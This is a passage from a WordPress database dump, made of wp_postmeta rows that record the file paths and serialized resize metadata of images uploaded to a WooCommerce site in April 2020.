m-Simple-Sales-Marketing-Presentation-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:57:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1.jpg\";}'),(13820,5324,'_wp_attached_file','2020/04/3-2-scaled.jpg'),(13821,5324,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/3-2-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"3-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"3-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"3-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"3-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"3-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"3-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"3-2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"3-2-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"3-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"3-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"3-2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"3-2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"3-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"3-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"3-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"3-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"3-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"3-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"3-2.jpg\";}'),(13822,5325,'_wp_attached_file','2020/04/4-2-scaled.jpg'),(13823,5325,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/4-2-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"4-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"4-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"4-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"4-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"4-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"4-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"4-2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"4-2-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"4-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"4-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"4-2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"4-2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"4-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"4-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"4-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"4-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"4-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"4-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"4-2.jpg\";}'),(13824,5326,'_wp_attached_file','2020/04/5-2-scaled.jpg'),(13825,5326,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/5-2-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"5-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"5-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"5-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"5-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"5-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"5-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"5-2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"5-2-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"5-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"5-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"5-2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"5-2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"5-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"5-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"5-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"5-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"5-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"5-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"5-2.jpg\";}'),(13826,5327,'_wp_attached_file','2020/04/6-2-scaled.jpg'),(13827,5327,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/6-2-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"6-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"6-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"6-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"6-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"6-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"6-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"6-2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"6-2-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"6-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"6-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"6-2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"6-2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"6-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"6-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"6-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"6-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"6-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"6-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"6-2.jpg\";}'),(13828,5328,'_wp_attached_file','2020/04/7-2-scaled.jpg'),(13829,5328,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/7-2-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"7-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"7-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"7-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"7-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"7-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"7-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"7-2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"7-2-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"7-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"7-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"7-2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"7-2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"7-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"7-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"7-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"7-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"7-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"7-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"7-2.jpg\";}'),(13830,5329,'_wp_attached_file','2020/04/8-1-scaled.jpg'),(13831,5329,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/8-1-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"8-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"8-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"8-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"8-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"8-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"8-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"8-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"8-1-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"8-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"8-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"8-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"8-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"8-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"8-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"8-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"8-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"8-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"8-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"8-1.jpg\";}'),(13832,5330,'_wp_attached_file','2020/04/9-1-scaled.jpg'),(13833,5330,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/9-1-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"9-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"9-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"9-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"9-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"9-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"9-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"9-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s